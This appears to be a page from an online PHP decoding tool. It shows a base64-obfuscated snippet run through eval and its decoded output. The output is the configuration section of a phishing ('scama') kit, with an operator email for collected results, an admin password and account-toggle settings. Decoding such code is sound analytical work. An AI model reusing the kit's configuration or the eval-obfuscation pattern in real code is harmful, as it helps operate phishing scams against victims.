Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $code ='Ly8gd3JpdGUgaGVyZSB5b3VyIGVtYWlsIChpbG9uYWtibXBAZ21haWwuY29tIGJ5IGRlZmF1bH..

Decoded Output download

// write here your email ([email protected] by default)
$your_email = "[email protected]";

//write your scama password (12345 by default)
$password = "RED-BLACK-NEWBIE-HACKER";


//---------------------  Don't touch it !!! --------------------------------
$wrong_password_Error = " Your password is wrong .";
$help = "Check your email <b>( $your_email )</b> , to find your password .";
$permession_Error = "You have no permission to access to this file/page .";
$account_is_on = "_.php?account=on";
$account_is_off = "_.php?account=off";
//--------------------------------------------------------------------------

Did this file decode correctly?

Original Code

<?php 
$code ='Ly8gd3JpdGUgaGVyZSB5b3VyIGVtYWlsIChpbG9uYWtibXBAZ21haWwuY29tIGJ5IGRlZmF1bHQpDQokeW91cl9lbWFpbCA9ICJtZmFkanJpbkB5YW5kZXguY29tIjsNCg0KLy93cml0ZSB5b3VyIHNjYW1hIHBhc3N3b3JkICgxMjM0NSBieSBkZWZhdWx0KQ0KJHBhc3N3b3JkID0gIlJFRC1CTEFDSy1ORVdCSUUtSEFDS0VSIjsNCg0KDQovLy0tLS0tLS0tLS0tLS0tLS0tLS0tLSAgRG9uJ3QgdG91Y2ggaXQgISEhIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokd3JvbmdfcGFzc3dvcmRfRXJyb3IgPSAiIFlvdXIgcGFzc3dvcmQgaXMgd3JvbmcgLiI7DQokaGVscCA9ICJDaGVjayB5b3VyIGVtYWlsIDxiPiggJHlvdXJfZW1haWwgKTwvYj4gLCB0byBmaW5kIHlvdXIgcGFzc3dvcmQgLiI7DQokcGVybWVzc2lvbl9FcnJvciA9ICJZb3UgaGF2ZSBubyBwZXJtaXNzaW9uIHRvIGFjY2VzcyB0byB0aGlzIGZpbGUvcGFnZSAuIjsNCiRhY2NvdW50X2lzX29uID0gIl8ucGhwP2FjY291bnQ9b24iOw0KJGFjY291bnRfaXNfb2ZmID0gIl8ucGhwP2FjY291bnQ9b2ZmIjsNCi8vLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0=';
eval(base64_decode($code));
?>

Function Calls

base64_decode 1

Variables

$code Ly8gd3JpdGUgaGVyZSB5b3VyIGVtYWlsIChpbG9uYWtibXBAZ21haWwuY29t..

Stats

MD5 8228aeeb5d535bcf7185c282eac76c90
Eval Count 1
Decode Time 103 ms